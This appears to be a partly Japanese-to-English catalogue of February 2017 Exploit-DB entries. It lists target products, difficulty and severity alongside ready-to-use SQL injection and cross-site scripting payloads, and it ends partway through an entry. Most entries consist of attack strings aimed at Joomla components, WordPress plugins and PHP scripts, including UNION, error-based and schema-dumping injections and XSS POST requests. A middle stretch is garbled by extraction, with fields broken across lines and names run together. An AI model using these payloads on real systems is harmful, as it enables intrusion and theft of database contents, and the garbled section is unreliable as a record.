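2017-02-10 | EDB 41300 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Multilanguage Estate Agency Pro 1.2 - property_show.php SQL Injection vulnerability
Attack code: /property_show.php?id=1%20and%201=1--
Target program: Multilanguage Estate Agency Pro | Target environment: Multilanguage Estate Agency Pro 1.2

2017-02-11 | EDB 41327 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Soccer Bet 4.1.5 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_soccerbet&view=matches&cat=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Soccer Bet 4.1.5

2017-02-11 | EDB 41326 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Vik Booking 1.7 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_vikbooking&view=availability&room_ids[0]=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Vik Booking 1.7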
2017-02-11 | EDB 41325 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Sponsor Wall 7.0 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_sponsorwall&task=click&wallid=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Sponsor Wall 7.0

2017-02-11 | EDB 41324 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component onisMusic 2 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_onismusic&view=songs&tag=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component onisMusic 2

2017-02-11 | EDB 41323 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component onisQuotes 2.5 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_onisquotes&view=quotes&tag=1%20and%201=1--&Itemid=180
Target program: Joomla | Target environment: Joomla! Component onisQuotes 2.5

2017-02-11 | EDB 41322 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component onisPetitions 2.5 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_onispetitions&view=petitions&tag=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component onisPetitions 2.5

2017-02-12 | EDB 41359 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Itech B2B Script 4.29 - /search.php SQL Injection vulnerability
Attack code: /search.php?keywords=') UNION ALL SELECT NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
Target program: Itech B2B Script | Target environment: Itech B2B Script 4.29

2017-02-12 | EDB 41359 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Itech B2B Script 4.29 - /catcompany.php SQL Injection vulnerability
Attack code: /catcompany.php?token=') UNION ALL SELECT NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
Target program: Itech B2B Script | Target environment: Itech B2B Script 4.29

2017-02-12 | EDB 41359 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Itech B2B Script 4.29 - /buyleads-details.php SQL Injection vulnerability
Attack code: /buyleads-details.php?id=') UNION ALL SELECT NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
Target program: Itech B2B Script | Target environment: Itech B2B Script 4.29

2017-02-12 | EDB 41359 | XSS | Difficulty: Easy | Severity: Medium
Name: Itech B2B Script 4.29 - /sendMessage.php XSS vulnerability
Attack code:
  POST /ajax-file/sendMessage.php HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  msg_message=<img src=i onerror=prompt(1)>
Target program: Itech B2B Script | Target environment: Itech B2B Script 4.29

2017-02-12 | EDB 41359 | XSS | Difficulty: Easy | Severity: Medium
Name: Itech B2B Script 4.29 - my-contactdetails.php XSS vulnerability
Attack code:
  POST /my-contactdetails.php HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  fname=<img src=i onerror=prompt(1)>
Target program: Itech B2B Script | Target environment: Itech B2B Script 4.29

2017-02-12 | EDB 41319 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Domains & Hostings Manager PRO 3.0 - edit.php SQL Injection vulnerability
Attack code: /edit.php?entries=1%20and%201=1--
Target program: Domains & Hostings Manager PRO | Target environment: Domains & Hostings Manager PRO 3.0

2017-02-12 | EDB 41318 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Quadz School Management System 3.1 - /index.php/suggestion/ SQL Injection vulnerability
Attack code: /index.php/suggestion/own_suggestion?uisd=1%20and%201=1--
Target program: Quadz School Management System | Target environment: Quadz School Management System 3.1

2017-02-12 | EDB 41315 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Viavi Real Estate - buysalerent.php SQL Injection
Attack code: /buysalerent.php?sort=1%20and%201=1--
Target program: Viavi | Target environment: Viavi Real Estate

2017-02-12 | EDB 41314 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: TI Online Examination System 2.0 - student_edit.php SQL Injection vulnerability
Attack code: /center/student_edit.php?s_id=1%20and%201=1--
Target program: TI Online Examination System | Target environment: TI Online Examination System 2.0

2017-02-12 | EDB 41314 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: TI Online Examination System 2.0 - edit_notice.php SQL Injection vulnerability
Attack code: /center/edit_notice.php?n_id=1%20and%201=1--
Target program: TI Online Examination System | Target environment: TI Online Examination System 2.0

2017-02-12 | EDB 41328 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Soccer Bet 4.1.5 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_soccerbet&view=userbethistory&userid=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Soccer Bet 4.1.5

2017-02-12 | EDB 41313 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: WhizBiz 1.9 - /index.php/en/results/ SQL Injection vulnerability
Attack code: /index.php/en/results/plainkey=1%20and%201=1--
Target program: WhizBiz | Target environment: WhizBiz 1.9

2017-02-12 | EDB 41314 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: TI Online Examination System 2.0 - exam_edit.php SQL Injection vulnerability
Attack code: /center/exam_edit.php?p_e_id=1%20and%201=1--
Target program: TI Online Examination System | Target environment: TI Online Examination System 2.0

2017-02-12 | EDB 41315 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Viavi Real Estate - property-detail.php SQL Injection vulnerability
Attack code: /property-detail.php?pid=1%20and%201=1--
Target program: Viavi | Target environment: Viavi Real Estate

2017-02-12 | EDB 41316 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Viavi Movie Review - 'id' Parameter SQL Injection
Attack code: /genres.php?id=1%20and%201=1--
Target program: Viavi | Target environment: Viavi Movie Review
2017-02-12 41317 SQL Injection 易 中
Viavi Product Review -
category.php SQL Injection 脆弱
性
/category.php?id=1%20and%201=1-- ViaviViavi Product
Review
2017-02-12 41318 SQL Injection 易 中
Quadz School Management
System 3.1 - /index.php/sclass/
SQL Injection 脆弱性
/index.php/sclass/ownClassRoutin?uisd=1%20and%201=1--
Quadz School
Management
System
Quadz School
Management
System 3.1
2017-02-12 41319 SQL Injection 易 中
Domains & Hostings Manager
PRO 3.0 - list.php SQL Injection
脆弱性
/list.php?entries=1%20and%201=1--
Domains &
Hostings
Manager PRO
Domains &
Hostings
Manager PRO
3.0
2017-02-13 41347 SQL Injection 易 中
Joomla! Component JE
Messanger - index.php SQL
Injection 脆弱性
/index.php?option=com_jemessenger&view=box_detail&fol
der=Inbox&task=edit&Itemid=1496&cid[0]=1%20and%201
=1--
Joomla
Joomla!
Component JE
Messanger
2017-02-13 41346 SQL Injection 易 中
Joomla! Component JE Ticket
System 1.2 - index.php SQL
Injection 脆弱性
/index.php?option=com_jeticket&view=assign_detail&cid[0]
=1%20and%201=1--Joomla
Joomla!
Component JE
Ticket System
1.2
2017-02-13 41345 SQL Injection 易 中
Joomla! Component JE Portfolio
Creator 1.2 - index.php SQL
Injection 脆弱性
/index.php?option=com_jeportfolio&view=item_detail&d_it
emid=1%20and%201=1--Joomla
Joomla!
Component JE
Portfolio
Creator 1.2
2017-02-13 41344 SQL Injection 易 中
Joomla! Component JE Form
Creator 1.8 - index.php SQL
Injection 脆弱性
/index.php?option=com_jeformcr&view=form&Itemid=1%2
0and%201=1--Joomla
Joomla!
Component JE
Form Creator
1.8
2017-02-13 41343 SQL Injection 易 中
Joomla! Component JE K2
Multiple Form Story 1.3 -
index.php SQL Injection 脆弱性
/index.php?option=com_jek2storymultipleform&view=jesub
mit&Itemid=1%20and%201=1--Joomla
Joomla!
Component JE
K2 Multiple
Form Story 1.3
2017-02-13 41342 SQL Injection 易 中
Joomla! Component JE Grid
Folio - index.php SQL Injection
脆弱性
/index.php?option=com_jegridfolio&view=category_detail&
id=1%20and%201=1--Joomla
Joomla!
Component JE
Grid Folio
2017-02-13 41341 SQL Injection 易 中
Joomla! Component JE Quiz 2.3
- index.php SQL Injection 脆弱
性
/index.php?option=com_jequizmanagement&view=questio
n&eid=1%20and%201=1--Joomla
Joomla!
Component JE
Quiz 2.3
2017-02-13 41340 SQL Injection 易 中
Joomla! Component Hbooking
1.9.9 - index.php SQL Injection
脆弱性
/index.php?option=com_hbooking&view=roomlisting&tem
p=hotel&h_id=1%20and%201=1--Joomla
Joomla!
Component
Hbooking
1.9.9
2017-02-13 41339 SQL Injection 易 中
Joomla! Component JE Awd
Song 1.8 - /index.php SQL
Injection 脆弱性
/index.php?option=com_jeawdsong&view=song_detail&id=
1%20and%201=1--Joomla
Joomla!
Component JE
Awd Song 1.8
2017-02-13 41338 SQL Injection 易 中
Joomla! Component JE Auto 1.5
- index.php SQL Injection 脆弱
性
/index.php?option=com_jeauto&view=item_detail&d_itemi
d=1%20and%201=1--Joomla
Joomla!
Component JE
Auto 1.5
2017-02-13 41337 SQL Injection 易 中
Joomla! Component JE auction
1.6 - index.php SQL Injection 脆
弱性
/index.php?option=com_jeauction&view=event_detail&eid
=1%20and%201=1--Joomla
Joomla!
Component JE
auction 1.6
2017-02-13 41336 SQL Injection 易 中
Joomla! Component JE Video
Rate 1.0 - index.php SQL
Injection 脆弱性
/index.php?option=com_jevideorate&view=video&cat_id=1
%20and%201=1--Joomla
Joomla!
Component JE
Video Rate 1.0
2017-02-13 41335 SQL Injection 易 中
Joomla! Component JE Tour 2.0
- index.php SQL Injection 脆弱
性
/index.php?option=com_jetour&view=package_detail&pid=
1%20and%201=1--Joomla
Joomla!
Component JE
Tour 2.0
2017-02-13 41334 SQL Injection 易 中
Joomla! Component JE Property
Finder 1.6.3 - index.php SQL
Injection 脆弱性
/index.php?option=com_jepropertyfinder&view=section_de
tail&sf_id=1%20and%201=1--Joomla
Joomla!
Component JE
Property
Finder 1.6.3
2017-02-13 41333 SQL Injection 易 中
Joomla! Component JE
QuoteForm - index.php SQL
Injection 脆弱性
/index.php?option=com_jequoteform&view=form&Itemid=
1%20and%201=1--Joomla
Joomla!
Component JE
QuoteForm
2017-02-13 | EDB 41332 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component JE Directory 1.7 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_jedirectory&view=item_detail&ditemid=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component JE Directory 1.7
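2017-02-13 | EDB 41331 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component JE Gallery 1.3 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_jegallery&view=photo_detail&photo_id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component JE Gallery 1.3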
2017-02-13 | EDB 41330 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component JE Classify Ads 1.2 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_jeclassifyads&view=item_detail&pro_id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component JE Classify Ads 1.2
2017-02-13 | EDB 41329 | SQL Injection | Difficulty: Hard | Severity: High
Name: PHP Marketplace Script - /shopby/ SQL Injection vulnerability
Attack code: /shopby/all?q=LIEQ") AND (SELECT 7200 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(7200=7200,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("SRxl"="SRxl
Target program: PHP Marketplace Script | Target environment: PHP Marketplace Script
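2017-02-15 | EDB 41362 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component JoomBlog 1.3.1 - SQL Injection
Attack code: /index.php?option=com_joomblog&task=tag&tag=Ihsan_Sencan%27%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component JoomBlog 1.3.1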
2017-02-15 | EDB 41368 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component JSP Store Locator 2.2 - 'id' Parameter SQL Injection
Attack code: /index.php?option=com_jsplocation&task=directionview&id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component JSP Store Locator 2.2
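2017-02-16 | EDB 41378 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component JEmbedAll 1.4 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_jembedall&downloadfree=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component JEmbedAll 1.4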
2017-02-16 | EDB 41371 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Spider Calendar Lite 3.2.16 - SQL Injection
Attack code: /index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Spider Calendar Lite 3.2.16
2017-02-16 | EDB 41372 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Spider Catalog Lite 1.8.10 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_spidercatalog&product_id=40&view=showproduct&page_num=1&back=1&show_category_details=0&display_type=list&show_subcategories=0&show_subcategories_products=0&show_products=1&select_categories=0&Itemid=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Spider Catalog Lite 1.8.10
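2017-02-16 | EDB 41373 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Spider Facebook 1.6.1 - SQL Injection
Attack code: /index.php?option=com_spiderfacebook&task=loginwith&name=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Spider 1.6.1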
2017-02-16 | EDB 41374 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Spider FAQ Lite 1.3.1 - SQL Injection
Attack code: /index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&searchform=1&expand=0&Itemid=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Spider FAQ Lite 1.3.1
2017-02-16 | EDB 41377 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: dotCMS 3.6.1 - / SQL Injection vulnerability
Attack code: /categoriesServlet?q=%5c%5c%27)+OR%2f%2a%2a%2f(SELECT(SUBSTRING((SELECT(${column})FROM(${database}.user_)LIMIT%2f%2a%2a%2f${index},1),${offset},1)))LIKE+BINARY+${char}%2f%2a%2a%2fORDER+BY+category.sort_order%23
Target program: dotCMS | Target environment: dotCMS 3.6.1
2017-02-17 | EDB 41382 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component WMT Content Timeline 1.0 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_wmt_content_timeline&task=returnArticle&id=66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),13,14,15--+-
Target program: Joomla | Target environment: Joomla! Component WMT Content Timeline 1.0
2017-02-17 | EDB 41380 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Groovy Gallery 1.0.0 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_groovygallery&view=images&filter_category=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Groovy Gallery 1.0.0
2017-02-17 | EDB 41379 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Team Display 1.2.1 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_teamdisplay&view=members&filter_category=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Team Display 1.2.1
2017-02-18 | EDB 41438 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: WordPress Plugin Mail Masta 1.0 - csvexport.php SQL Injection vulnerability
Attack code: /wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
Target program: WordPress | Target environment: WordPress Plugin Mail Masta 1.0
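2017-02-18 | EDB 41438 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: WordPress Plugin Mail Masta 1.0 - admin.php SQL Injection vulnerability
Attack code: /wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1
Target program: WordPress | Target environment: WordPress Plugin Mail Masta 1.0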
2017-02-18 | EDB 41438 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: WordPress Plugin Mail Masta 1.0 - admin-ajax.php SQL Injection vulnerability
Attack code:
POST /wp-admin/admin-ajax.php?id= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
Target program: WordPress | Target environment: WordPress Plugin Mail Masta 1.0
2017-02-18 | EDB 41393 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Most Wanted Real Estate 1.1.0 - / SQL Injection vulnerability
Attack code: /?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=&filter_a1minland=&filter_a1maxland=&filter_a1landtype=0&which_order=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Most Wanted Real Estate 1.1.0
2017-02-18 | EDB 41391 | SQL Injection | Difficulty: Hard | Severity: High
Name: Joomla! Component Google Map Store Locator 4.4 - / SQL Injection vulnerability
Attack code: /?filter_to=a&filter_day=21-02-2017&filter_time=+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
Target program: Joomla | Target environment: Joomla! Component Google Map Store Locator 4.4
2017-02-18 | EDB 41390 | SQL Injection | Difficulty: Hard | Severity: High
Name: Joomla! Component Bazaar Platform 3.0 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_bazaar&view=productsearch&searchproduct=a&category=1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
Target program: Joomla | Target environment: Joomla! Component Bazaar Platform 3.0
2017-02-18 | EDB 41389 | SQL Injection | Difficulty: Hard | Severity: High
Name: Joomla! Component Room Management 1.0 - /room/ SQL Injection vulnerability
Attack code: /room/book?tmpl=component&id=5&date='+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
Target program: Joomla | Target environment: Joomla! Component Room Management 1.0
2017-02-18 | EDB 41388 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component OS Services Booking 2.5.1 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_osservicesbooking&task=default_showmap&vid=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component OS Services Booking 2.5.1
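2017-02-18 | EDB 41387 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component EShop 2.5.1 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_eshop&view=category&id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component EShop 2.5.1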
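2017-02-18 | EDB 41386 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component OS Property 3.0.8 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_osproperty&view=ltype&catIds[0]=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component OS Property 3.0.8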
2017-02-18 | EDB 41383 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Joomloc-CAT 4.1.3 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Joomloc-CAT 4.1.3
2017-02-18 | EDB 41384 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Joomloc-Lite 1.3.2 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_joomloc&view=loc&layout=singleloc&site_id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Joomloc-Lite 1.3.2
2017-02-18 | EDB 41385 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection
Attack code: /index.php?option=com_awdwall&task=gethovercard&wuid=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component JomWALL 4.0
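2017-02-20 | EDB 41399 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component MaQma Helpdesk 4.2.7 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_maqmahelpdesk&task=pdf_kb&id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component MaQma Helpdesk 4.2.7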
2017-02-20 | EDB 41400 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component PayPal IPN for DOCman 3.1 - index.php SQL Injection
Attack code: /index.php?option=com_docmanpaypal&task=addToCart&id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component PayPal IPN for DOCman 3.1
2017-02-21 | EDB 41412 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component AppointmentBookingPro 4.0.1 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_rsappt_pro3&view=resourceslist&tags=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component AppointmentBookingPro 4.0.1
2017-02-21 | EDB 41405 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component J-HotelPortal 6.0.2 - 'review_id' Parameter SQL Injection
Attack code: /index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component J-HotelPortal 6.0.2
2017-02-21 | EDB 41406 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component J-CruiseReservation Standard 3.0 - 'city' Parameter SQL Injection
Attack code: /cruises/cruises?city=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component J-CruiseReservation Standard 3.0
2017-02-21 | EDB 41407 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Eventix Events Calendar 1.0 - SQL Injection
Attack code: /index.php?option=com_eventix&view=eventsday&selected_date=2017-02-16&day=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Eventix Events Calendar 1.0
2017-02-21 | EDB 41408 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component J-MultipleHotelReservation Standard 6.0.2 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component J-MultipleHotelReservation Standard 6.0.2
2017-02-21 | EDB 41409 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Directorix Directory Manager 1.1.1 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_directorix&view=entriessearch&search_categories[]=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Directorix Directory Manager 1.1.1
2017-02-21 | EDB 41410 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Magic Deals Web 1.2.0 - index.php SQL Injection vulnerability
Attack code: /index.php?filterbycats=all&fullordering=1%20and%201=1--&option=com_magicdealsweb&task=dealswebindex&view=dealswebindex
Target program: Joomla | Target environment: Joomla! Component Magic Deals Web 1.2.0
2017-02-21 | EDB 41411 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component J-BusinessDirectory 4.6.8 - SQL Injection
Attack code: /index.php?option=com_jbusinessdirectory&view=companies&companyId=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component J-BusinessDirectory 4.6.8
2017-02-21 | EDB 41412 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component AppointmentBookingPro 4.0.1 - SQL Injection vulnerability
Attack code: /component/rsappt_pro3/booking_screen_gad/891/show_confirmation/ff09f352c87f96e505706df0cfa3e8cc/999%27%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component AppointmentBookingPro 4.0.1
2017-02-22 | EDB 41431 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component MediaLibrary Basic 3.5 - index.php SQL Injection vulnerability (2)
Attack code: /index.php/medialibrary/media/all-books/all-books/345/lend_request?mid[0]=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component MediaLibrary Basic 3.5
2017-02-22 | EDB 41427 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection
Attack code: /index.php?option=com_contentmap&owner=plugin&view=smartloader&id=10135&Itemid=606&type=json&filename=articlesmarkers&source=article&contentid=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component ContentMap 1.3.8
2017-02-22 | EDB 41428 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component VehicleManager 3.9 - SQL Injection
Attack code: /index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all&vcondition=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component VehicleManager 3.9
2017-02-22 | EDB 41429 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component RealEstateManager 3.9 - SQL Injection
Attack code: /index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=all&listing_status=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component RealEstateManager 3.9
2017-02-22 | EDB 41430 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component BookLibrary 3.6.1 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_booklibrary&task=suggestion&comment=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component BookLibrary 3.6.1
2017-02-22 | EDB 41431 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component MediaLibrary Basic 3.5 - index.php SQL Injection vulnerability
Attack code: /index.php/medialibrary/media/all-books/all-books/345/view/book/19%27%20and%201=1--/Ihsan_Sencan
Target program: Joomla | Target environment: Joomla! Component MediaLibrary Basic 3.5
2017-02-23 | EDB 41440 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Store for K2 3.8.2 - SQL Injection
Attack code: /index.php?option=com_k2store&view=checkout&task=getCountry&=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Store for K2 3.8.2
2017-02-23 | EDB 41441 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Joomla! Component UserExtranet 1.3.1 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_userextranet&view=folders&fid=66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
Target program: Joomla | Target environment: Joomla! Component UserExtranet 1.3.1
2017-02-23 | EDB 41442 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Joomla! Component MultiTier 3.1 - index.php SQL Injection vulnerability
Attack code: /index.php/component/multitier/?mtpage=takecodel&tid=1&lid=66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
Target program: Joomla | Target environment: Joomla! Component MultiTier 3.1
2017-02-24 | EDB 41450 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Joomla! Component GPS Tools 4.0.1 - SQL Injection
